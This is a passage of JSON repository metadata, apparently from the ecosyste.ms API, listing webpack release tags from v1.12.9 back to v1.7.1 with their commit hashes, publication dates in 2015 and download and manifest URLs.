cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_u